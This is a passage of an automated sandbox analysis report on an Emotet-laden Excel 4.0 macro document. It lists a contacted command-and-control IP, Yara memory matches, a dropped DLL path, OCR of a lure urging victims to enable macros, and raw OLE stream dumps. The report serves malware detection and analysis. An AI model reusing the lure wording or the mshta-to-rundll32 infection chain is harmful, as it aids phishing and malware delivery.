                            Source: unknownTCP traffic detected without corresponding DNS query: 91.240.118.168
                            Source: unknownTCP traffic detected without corresponding DNS query: 91.240.118.168
                            Source: unknownTCP traffic detected without corresponding DNS query: 91.240.118.168
                            Source: unknownTCP traffic detected without corresponding DNS query: 91.240.118.168
                            Source: unknownTCP traffic detected without corresponding DNS query: 91.240.118.168
                            Source: mshta.exe, 00000004.00000003.430703152.000000000031C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.454494947.000000000031C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: /moc.nideknil.wwwwww.linkedin.com equals www.linkedin.com (Linkedin)
                            Source: mshta.exe, 00000004.00000003.430703152.000000000031C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.454494947.000000000031C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: www.linkedin.com equals www.linkedin.com (Linkedin)
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_1001B43F GetKeyState,GetKeyState,GetKeyState,GetKeyState,SendMessageA,9_2_1001B43F
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_1001B43F GetKeyState,GetKeyState,GetKeyState,GetKeyState,SendMessageA,11_2_1001B43F
                            Source: C:\Windows\System32\mshta.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior

                            E-Banking Fraud

                            barindex
                            Yara detected Emotet
                            Source: Yara matchFile source: 17.2.rundll32.exe.2a0000.1.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 17.2.rundll32.exe.2810000.7.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 18.2.rundll32.exe.1d0000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 9.2.rundll32.exe.140000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 15.2.rundll32.exe.2f40000.12.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 12.2.rundll32.exe.2380000.9.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 10.2.rundll32.exe.2380000.5.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 19.2.rundll32.exe.230000.1.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 10.2.rundll32.exe.2ed0000.12.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 14.2.rundll32.exe.380000.0.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 12.2.rundll32.exe.25f0000.12.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 12.2.rundll32.exe.2320000.7.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 17.2.rundll32.exe.23e0000.6.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 19.2.rundll32.exe.180000.0.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 17.2.rundll32.exe.910000.4.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 15.2.rundll32.exe.3d0000.2.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 17.2.rundll32.exe.2e80000.11.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 15.2.rundll32.exe.a40000.4.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 14.2.rundll32.exe.380000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 19.2.rundll32.exe.180000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 17.2.rundll32.exe.2f30000.12.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 15.2.rundll32.exe.a70000.5.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 11.2.rundll32.exe.180000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 14.2.rundll32.exe.5f0000.1.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 12.2.rundll32.exe.2670000.13.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 11.2.rundll32.exe.180000.0.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 10.2.rundll32.exe.2860000.9.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 15.2.rundll32.exe.25c0000.9.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 15.2.rundll32.exe.2590000.8.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 12.2.rundll32.exe.25f0000.12.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 15.2.rundll32.exe.2410000.7.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 15.2.rundll32.exe.2f40000.12.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 15.2.rundll32.exe.2e40000.10.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 17.2.rundll32.exe.7a0000.2.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 12.2.rundll32.exe.230000.0.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 12.2.rundll32.exe.24d0000.11.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 12.2.rundll32.exe.a60000.4.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 12.2.rundll32.exe.230000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 10.2.rundll32.exe.1a0000.0.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 12.2.rundll32.exe.2350000.8.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 16.2.rundll32.exe.1d0000.0.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 10.2.rundll32.exe.28e0000.10.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 15.2.rundll32.exe.1a0000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 10.2.rundll32.exe.26b0000.6.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 18.2.rundll32.exe.240000.1.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 12.2.rundll32.exe.2280000.5.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 16.2.rundll32.exe.200000.1.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 17.2.rundll32.exe.2e50000.10.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 10.2.rundll32.exe.3d0000.3.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 10.2.rundll32.exe.2ed0000.12.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 17.2.rundll32.exe.820000.3.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 10.2.rundll32.exe.26b0000.6.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 17.2.rundll32.exe.2e20000.9.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 17.2.rundll32.exe.31d0000.13.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 15.2.rundll32.exe.8a0000.3.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 15.2.rundll32.exe.2fd0000.13.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 15.2.rundll32.exe.ae0000.6.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 15.2.rundll32.exe.1d0000.1.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 12.2.rundll32.exe.23d0000.10.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 16.2.rundll32.exe.1d0000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 15.2.rundll32.exe.1a0000.0.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 12.2.rundll32.exe.910000.3.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 17.2.rundll32.exe.2960000.8.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 17.2.rundll32.exe.220000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 17.2.rundll32.exe.2250000.5.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 15.2.rundll32.exe.2eb0000.11.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 10.2.rundll32.exe.2730000.7.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 17.2.rundll32.exe.220000.0.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 11.2.rundll32.exe.1b0000.1.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 10.2.rundll32.exe.3170000.13.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 15.2.rundll32.exe.a40000.4.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 9.2.rundll32.exe.170000.1.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 12.2.rundll32.exe.23d0000.10.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 12.2.rundll32.exe.2350000.8.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 12.2.rundll32.exe.770000.1.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 10.2.rundll32.exe.1a0000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 18.2.rundll32.exe.1d0000.0.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 17.2.rundll32.exe.7a0000.2.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 15.2.rundll32.exe.ae0000.6.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 16.2.rundll32.exe.10000000.2.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 10.2.rundll32.exe.370000.2.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 12.2.rundll32.exe.a60000.4.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 17.2.rundll32.exe.2f30000.12.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 15.2.rundll32.exe.2e40000.10.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 10.2.rundll32.exe.400000.4.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 12.2.rundll32.exe.8e0000.2.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 10.2.rundll32.exe.27a0000.8.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 17.2.rundll32.exe.2960000.8.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 17.2.rundll32.exe.23e0000.6.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 10.2.rundll32.exe.2e70000.11.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 10.2.rundll32.exe.400000.4.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 15.2.rundll32.exe.3d0000.2.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 10.2.rundll32.exe.28e0000.10.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 10.2.rundll32.exe.370000.2.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 14.2.rundll32.exe.10000000.2.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 12.2.rundll32.exe.8e0000.2.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 15.2.rundll32.exe.2590000.8.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 10.2.rundll32.exe.220000.1.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 11.2.rundll32.exe.10000000.2.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 9.2.rundll32.exe.140000.0.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 12.2.rundll32.exe.22b0000.6.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 12.2.rundll32.exe.22b0000.6.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 17.2.rundll32.exe.910000.4.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 10.2.rundll32.exe.27a0000.8.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 18.2.rundll32.exe.10000000.2.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 17.2.rundll32.exe.2e50000.10.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 15.2.rundll32.exe.10000000.14.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 12.2.rundll32.exe.10000000.14.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 9.2.rundll32.exe.10000000.2.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 19.2.rundll32.exe.10000000.5.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 17.2.rundll32.exe.10000000.14.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 10.2.rundll32.exe.10000000.14.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 0000000C.00000002.574709897.0000000000230000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000A.00000002.522412460.00000000028E0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000C.00000002.574966326.0000000000911000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000A.00000002.521968966.0000000000400000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000A.00000002.521762770.0000000000221000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000C.00000002.575355954.00000000024D1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000013.00000002.682108397.0000000000231000.00000020.00000001.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000A.00000002.522161075.0000000002381000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000A.00000002.522361954.0000000002861000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000A.00000002.522256343.0000000002731000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000011.00000002.673081131.00000000002A1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000F.00000002.616094913.00000000003D0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000E.00000002.577991543.0000000010001000.00000020.00000001.01000000.0000000D.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000A.00000002.522563448.0000000002E71000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000A.00000002.522208158.00000000026B0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000C.00000002.575698621.0000000002671000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000011.00000002.675215228.0000000002E21000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000011.00000002.675330890.0000000002E81000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000011.00000002.677230667.0000000010001000.00000020.00000001.01000000.0000000F.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000A.00000002.522291162.00000000027A0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000C.00000002.575069937.0000000002281000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000C.00000002.575241988.0000000002381000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000009.00000002.471453842.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000C.00000002.575278324.00000000023D0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000012.00000002.678452410.0000000000241000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000B.00000002.524549461.0000000000180000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000011.00000002.673490791.0000000002251000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000F.00000002.616750004.0000000002E40000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000F.00000002.616484887.0000000000AE0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000013.00000002.687313669.0000000010001000.00000020.00000001.01000000.00000010.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000F.00000002.616301764.00000000008A1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000011.00000002.673601215.0000000002811000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000011.00000002.675278836.0000000002E50000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000009.00000002.471331786.0000000000171000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000F.00000002.616955117.0000000002F40000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000011.00000002.673042649.0000000000220000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000E.00000002.577507576.0000000000380000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000F.00000002.616430850.0000000000A71000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000F.00000002.616392195.0000000000A40000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000A.00000002.521709838.00000000001A0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000F.00000002.615957746.00000000001A0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000A.00000002.521942436.00000000003D1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000012.00000002.678978438.0000000010001000.00000020.00000001.01000000.0000000F.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000B.00000002.525704176.0000000010001000.00000020.00000001.01000000.0000000C.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000012.00000002.678388304.00000000001D0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000011.00000002.673313788.00000000007A0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000A.00000002.521853368.0000000000370000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000F.00000002.616649136.0000000002590000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000010.00000002.618439586.0000000010001000.00000020.00000001.01000000.0000000E.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000C.00000002.575484750.00000000025F0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000C.00000002.575139258.0000000002321000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000011.00000002.675083188.0000000002960000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000C.00000002.575185069.0000000002350000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000F.00000002.615997372.00000000001D1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000A.00000002.522595880.0000000002ED0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000F.00000002.616558132.0000000002411000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000F.00000002.616683416.00000000025C1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000C.00000002.575020499.0000000000A60000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000F.00000002.616861944.0000000002EB1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000F.00000002.617100945.0000000010001000.00000020.00000001.01000000.0000000E.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000011.00000002.673429165.0000000000910000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000009.00000002.471313951.0000000000140000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000B.00000002.524627088.00000000001B1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000A.00000002.522683360.0000000010001000.00000020.00000001.01000000.0000000C.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000E.00000002.577775644.00000000005F1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000C.00000002.574936921.00000000008E0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000A.00000002.522655348.0000000003171000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000C.00000002.575098711.00000000022B0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000C.00000002.575908934.0000000010001000.00000020.00000001.01000000.0000000D.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000011.00000002.675391959.0000000002F30000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000013.00000002.681991915.0000000000180000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000011.00000002.673370884.0000000000821000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000F.00000002.617022562.0000000002FD1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000010.00000002.618251514.0000000000201000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000C.00000002.574901913.0000000000771000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000011.00000002.673563319.00000000023E0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000011.00000002.677112650.00000000031D1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000010.00000002.618216688.00000000001D0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: C:\ProgramData\QWER.dll, type: DROPPED

                            System Summary

                            barindex
                            Found malicious Excel 4.0 Macro
                            Source: DETAILS-145.xlsMacro extractor: Sheet: Macro1 contains: mshta
                            Source: DETAILS-145.xlsMacro extractor: Sheet: Macro1 contains: mshta
                            Malicious sample detected (through community Yara rule)
                            Source: DETAILS-145.xls, type: SAMPLEMatched rule: Detects OLE Excel 4 Macros documents acting as downloaders Author: ditekSHen
                            Source: C:\Users\user\Desktop\DETAILS-145.xls, type: DROPPEDMatched rule: Detects OLE Excel 4 Macros documents acting as downloaders Author: ditekSHen
                            Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
                            Source: Screenshot number: 4Screenshot OCR: ENABLE EDITING" and "ENABLE CONTENT" buttons to preview this document. 16 17 18 19 20 21 22
                            Source: Screenshot number: 4Screenshot OCR: DOCUMENT IS PROTECTED. 10 11 12 13 Previewing is not available for protected documents. 14 15
                            Source: Screenshot number: 4Screenshot OCR: protected documents. 14 15 You have to press "ENABLE EDITING" and "ENABLE CONTENT" buttons to pre
                            Source: Screenshot number: 4Screenshot OCR: ENABLE CONTENT" buttons to preview this document. 16 17 18 19 20 21 22 23 24 25 26 27 2
                            Source: Document image extraction number: 0Screenshot OCR: ENABLE EDITING" and "ENABLE CONTENT" buttons to preview this document.
                            Source: Document image extraction number: 0Screenshot OCR: DOCUMENT IS PROTECTED. Previewing is not available for protected documents. You have to press "ENA
                            Source: Document image extraction number: 0Screenshot OCR: protected documents. You have to press "ENABLE EDITING" and "ENABLE CONTENT" buttons to preview thi
                            Source: Document image extraction number: 0Screenshot OCR: ENABLE CONTENT" buttons to preview this document.
                            Source: Document image extraction number: 1Screenshot OCR: ENABLE EDITING" and "ENABLE CONTENT" buttons to preview this document.
                            Source: Document image extraction number: 1Screenshot OCR: DOCUMENT IS PROTECTED. Previewing is not available for protected documents. You have to press "ENA
                            Source: Document image extraction number: 1Screenshot OCR: protected documents. You have to press "ENABLE EDITING" and "ENABLE CONTENT" buttons to preview thi
                            Source: Document image extraction number: 1Screenshot OCR: ENABLE CONTENT" buttons to preview this document.
                            Source: Screenshot number: 8Screenshot OCR: ENABLE EDITING" and "ENABLE CONTENT" buttons to preview this document. 16 17 18 19 20 21 22 G
                            Source: Screenshot number: 8Screenshot OCR: DOCUMENT IS PROTECTED. 10 11 12 13 , , Previewing is not available for protected documents. 14
                            Source: Screenshot number: 8Screenshot OCR: protected documents. 14 15 You have to press "ENABLE EDITING" and "ENABLE CONTENT" buttons to pre
                            Source: Screenshot number: 8Screenshot OCR: ENABLE CONTENT" buttons to preview this document. 16 17 18 19 20 21 22 G) I I 23 24 25 26
                            Document contains OLE streams with names of living off the land binaries
                            Source: DETAILS-145.xlsStream path 'Workbook' : ........ZO..........................\.p....xXx B.....a.........=.............................................=........p.08.......X.@...........".......................1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1.*.h...6...........C.a.l.i.b.r.i. .L.i.g.h.t.1...,...6...........C.a.l.i.b.r.i.1.......6...........C.a.l.i.b.r.i.1.......6...........C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1.......<...........C.a.l.i.b.r.i.1.......>...........C.a.l.i.b.r.i.1.......?...........C.a.l.i.b.r.i.1.......4...........C.a.l.i.b.r.i.1.......4...........C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1.......?...........C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................A.r.i.a.l.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1.......?...........C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1.......9...........C.a.l.i.b.r.i...3......#.,.#.#.0.\. .".. ".;.\.-.#.,.#.#.0.\. .".. "...=......#.,.#.#.0.\. .".. ".;.[.R.e.d.].\.-.#.,.#.#.0.\. .".. "...?......#.,.#.#.0...0.0.\. .".. ".;.\.-.#.,.#.#.0...0.0.\. .".. "...I..."..#.,.#.#.0...0.0.\. .".. ".;.[.R.e.d.].\.-.#.,.#.#.0...0.0.\. .".. "...q.*.6.._.-.*. .#.,.#.#.0.\. .".. "._.-.;.\.-.*. .#.,.#.#.0.\. .".. "._.-.;._.-.*. .".-.".\. .".. "._.-.;._.-.@._.-...,.).'.._-* #,##0_-;\-* #,##0_-;_-* "-"_-;_-@_-....,.>.._.-.*. .#.,.#.#.0...0.0.\. .".. "._.-.;.\.-.*. .#.,.#.#.0...0.0.\. .".. "._.-.;._.-.*. .".-.".?.?.\. .".. "._.-.;._.-.@._.-...4.+./.._-* #,##0.00_-;\-* #,##0.00_-;_-* "-"??_-;_-@_-..?...:.._("$"* #,##0.00_);_("$"* \(#,##0.00\);_("$"* "-"??_);_(@_).......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .....
                            Source: DETAILS-145.xls.0.drStream path 'Workbook' : ........ZO..........................\.p....user B.....a.........=.............................................=........p.08.......X.@...........".......................1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1.*.h...6...........C.a.l.i.b.r.i. .L.i.g.h.t.1...,...6...........C.a.l.i.b.r.i.1.......6...........C.a.l.i.b.r.i.1.......6...........C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1.......<...........C.a.l.i.b.r.i.1.......>...........C.a.l.i.b.r.i.1.......?...........C.a.l.i.b.r.i.1.......4...........C.a.l.i.b.r.i.1.......4...........C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1.......?...........C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................A.r.i.a.l.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1.......?...........C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1.......9...........C.a.l.i.b.r.i...3......#.,.#.#.0.\. .".. ".;.\.-.#.,.#.#.0.\. .".. "...=......#.,.#.#.0.\. .".. ".;.[.R.e.d.].\.-.#.,.#.#.0.\. .".. 